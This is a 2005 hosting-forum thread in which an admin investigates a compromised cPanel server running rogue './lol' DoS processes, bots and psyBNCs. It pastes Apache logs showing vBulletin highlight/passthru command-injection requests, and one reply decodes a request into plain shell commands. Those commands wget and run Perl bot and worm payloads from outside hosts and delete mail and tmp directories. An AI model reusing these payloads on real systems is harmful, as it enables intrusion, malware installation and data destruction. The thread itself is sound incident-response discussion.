
01-12-2005, 08:16 AM
Web Hosting Guru (Join Date: Sep 2003, Location: UK, Posts: 342)
Process running as nobody
Hi all,
Below is a copy of my top
Code:
12:14:26 up 50 days, 59 min, 1 user, load average: 0.39, 0.42, 0.59
257 processes: 252 sleeping, 1 running, 0 zombie, 4 stopped
CPU states: 15.2% user 5.5% system 0.0% nice 0.0% iowait 79.1% idle
Mem: 514196k av, 502628k used, 11568k free, 0k shrd, 112768k buff
156332k active, 310968k inactive
Swap: 2104504k av, 196156k used, 1908348k free 145632k cached
PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
2465 root 19 0 1184 1184 804 R 5.5 0.2 0:01 0 top
31482 nobody 10 0 608 604 548 S 1.3 0.1 0:10 0 ./lol 30
1089 root 19 19 33184 13M 10400 S N 0.9 2.7 1646m 0 ./server_linux -PID=tsserver2.pid
28521 nobody 10 0 576 572 516 S 0.9 0.1 0:05 0 ./lol 30
28523 nobody 10 0 576 572 516 S 0.9 0.1 0:05 0 ./lol 30
19621 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30
20010 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30
20014 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30
20028 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30
20469 nobody 9 0 620 616 560 S 0.4 0.1 0:12 0 ./lol 30
20610 nobody 9 0 620 616 560 S 0.4 0.1 0:12 0 ./lol 30
22113 nobody 9 0 612 608 552 S 0.4 0.1 0:11 0 ./lol 30
23021 nobody 9 0 608 604 548 S 0.4 0.1 0:10 0 ./lol 30
23096 nobody 9 0 604 600 544 S 0.4 0.1 0:10 0 ./lol 30
23497 nobody 9 0 604 600 544 S 0.4 0.1 0:09 0 ./lol 30
23506 nobody 9 0 604 600 544 S 0.4 0.1 0:09 0 ./lol 30
24227 nobody 9 0 604 600 544 S 0.4 0.1 0:09 0 ./lol 30
24229 nobody 9 0 600 596 540 S 0.4 0.1 0:09 0 ./lol 30
25163 nobody 9 0 596 592 536 S 0.4 0.1 0:08 0 ./lol 30
26179 nobody 9 0 584 580 524 S 0.4 0.1 0:07 0 ./lol 30
26561 nobody 9 0 584 580 524 S 0.4 0.1 0:06 0 ./lol 30
27201 nobody 9 0 580 576 520 S 0.4 0.1 0:06 0 ./lol 30
28045 nobody 9 0 576 572 516 S 0.4 0.1 0:06 0 ./lol 30
28381 nobody 9 0 576 572 516 S 0.4 0.1 0:05 0 ./lol 30
28529 nobody 9 0 528 524 464 S 0.4 0.1 0:08 0 ./lol 30
28634 nobody 9 0 524 520 460 S 0.4 0.1 0:08 0 ./lol 30
28860 nobody 9 0 524 520 460 S 0.4 0.1 0:08 0 ./lol 30
30670 nobody 9 0 544 540 484 S 0.4 0.1 0:01 0 ./lol 30
31106 nobody 9 0 612 608 552 S 0.4 0.1 0:11 0 ./lol 30
31254 nobody 9 0 608 604 548 S 0.4 0.1 0:11 0 ./lol 30
1 root 8 0 472 440 424 S 0.0 0.0 0:58 0 init [3]
2 root 9 0 0 0 0 SW 0.0 0.0 0:01 0 keventd
3 root 9 0 0 0 0 SW 0.0 0.0 2:32 0 kapmd
4 root 19 19 0 0 0 SWN 0.0 0.0 0:00 0 ksoftirqd_CPU0
5 root 9 0 0 0 0 SW 0.0 0.0 7:31 0 kswapd
6 root 9 0 0 0 0 SW 0.0 0.0 0:00 0 bdflush
7 root 9 0 0 0 0 SW 0.0 0.0 2:02 0 kupdated
8 root 18446744073709551615 -20 0 0 0 SW< 0.0 0.0 0:00 0 mdrecoveryd
58 root 9 0 0 0 0 SW 0.0 0.0 0:00 0 khubd
277 root 9 0 0 0 0 SW 0.0 0.0 0:00 0 kjournald
278 root 9 0 0 0 0 SW 0.0 0.0 4:17 0 kjournald
279 root 9 0 0 0 0 SW 0.0 0.0 1:25 0 kjournald
280 root 9 0 0 0 0 SW 0.0 0.0 6:15 0 kjournald
281 root 9 0 0 0 0 SW 0.0 0.0 3:22 0 kjournald
750 root 9 0 556 520 476 S 0.0 0.1 3:41 0 syslogd -m 0
754 root 9 0 420 368 368 S 0.0 0.0 0:00 0 klogd -x
4411 root 9 0 984 776 776 S 0.0 0.1 0:00 0 /bin/bash
4414 root 9 0 940 804 788 S 0.0 0.1 0:38 0 /usr/sbin/sshd
4428 root 8 0 752 668 620 S 0.0 0.1 0:04 0 xinetd -stayalive -pidfile /var/run/xinetd.pid
4670 root 8 0 580 568 524 S 0.0 0.1 0:18 0 crond
I have just noticed ./lol 30 scripts being run as nobody.
I have checked /tmp (which is non-executable) and /var/tmp (again the same), and have just checked /dev/shm (which isn't non-executable).
I removed a few files from there.
I have tried killing the processes, however more seem to appear.
Can anyone help?
Thanks
__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.

01-12-2005, 08:20 AM
Web Hosting Master (Join Date: Feb 2004, Posts: 2,195)
Try running:
killall -9 lol
To find the file you can use:
locate lol
You may also want to install and run rkhunter and/or chkrootkit.
__________________
crucialparadigm - Affordable, Reliable, Professional :
Web Hosting
• 24/7 Support • Web Hosting • Reseller Hosting • Cloud/VPS Plans • Dedicated Servers •

01-12-2005, 08:39 AM
Web Hosting Master (Join Date: Dec 2004, Location: Canada, Posts: 1,076)
Looks like your box has been exploited.

01-12-2005, 08:40 AM
Web Hosting Master (Join Date: Apr 2003, Location: UK, Posts: 2,560)
If I remember correctly, lol is a dosser, and I suspect you'll find your attacker has got in via an insecure web script (check things like phpBB + Coppermine versions).
Check /var/tmp and /tmp for directories such as ". . " and the like.

01-12-2005, 08:51 AM
Sexy Mariachi (Join Date: Nov 2004, Location: Mexico City, Posts: 731)
Yep, check tmp or kill all processes running as nobody.

01-12-2005, 11:14 AM
Web Hosting Guru (Join Date: Sep 2003, Location: UK, Posts: 342)
Hi there,
I have run locate lol before, however nothing out of the ordinary comes up. Just a lot of .gif files.
I'm running updatedb and then going to try locate again to see if anything new comes up.
I have double-checked all directories and removed some more . folders.
Does anyone have a URL or any more information on the lol dosser, so I can isolate it and prevent it in the future?
//EDIT Just found lots of files in /usr/local/apache/proxy
One dir being Strobe, which is a port prober. Also a dir called scan which contains the lol files. Also there is a dir called flood; is it safe to remove the dir called flood?
Also, does Apache need the folder called proxy? If so, what folders does it need? There is also httpd -DSSL in it; is that another trick?
Thanks
Last edited by Veus; 01-12-2005 at 11:24 AM.

01-12-2005, 11:37 AM
Web Hosting Master (Join Date: Apr 2003, Location: UK, Posts: 2,560)
Yes, that's a trick; we've seen the same (hackers'?) tools on one of our customers' servers repeatedly. Out of interest, is this a cPanel server?
They used a file called httpd -DSSL as well as various other rubbish renaming methods. Also included were psyBNCs and bots. Most of their stuff they kept in /tmp and /var/tmp, although I did find stuff elsewhere. Try looking in your Apache logs for wget.

01-12-2005, 11:53 AM
Web Hosting Guru (Join Date: Sep 2003, Location: UK, Posts: 342)
That's the same as what I found, quite a few psyBNCs and a few bots. I'll have a look, thanks.
Yes, it is a cPanel server.
I'm running grep -i wget * on my logs now to find which user is being careless!

01-12-2005, 12:18 PM
Web Hosting Master (Join Date: Apr 2003, Location: UK, Posts: 2,560)
We found it was an old version of the Coppermine gallery software that was causing the problems (they were running 1.2, and 1.3.something is the latest secure version).

01-12-2005, 12:20 PM
Web Hosting Guru (Join Date: Sep 2003, Location: UK, Posts: 342)
After searching for wget in the domlogs, I have found the following entries:
Code:
/usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f088
9555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"
/usr/local/apache/domlogs/domain.com:70.84.39.148 - - [02/Jan/2005:09:15:23 +0000] "GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;pe
rl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 67361 "-" "LWP::Simple/5.803"
/usr/local/apache/domlogs/domain.com:203.24.100.137 - - [02/Jan/2005:11:25:51 +0000] "GET /showthread.php?t=9722&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;
perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0" 200 73304 "-" "LWP::Simple/5.64"
/usr/local/apache/domlogs/domain.com:208.234.15.155 - - [03/Jan/2005:22:47:40 +0000] "GET /printthread.php?t=9849&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117
;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 6881 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [10/Jan/2005:23:34:51 +0000] "GET /printthread.php?t=471&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2852 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [11/Jan/2005:07:45:01 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.63"
It is a vBulletin installation running the latest 3.0.5. Does anyone recognise this pattern?

01-12-2005, 03:13 PM
Web Hosting Master (Join Date: Jun 2003, Posts: 962)
Code:
GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget
%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527
is
GET /showthread.php?t=9840&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 
65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527
GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;w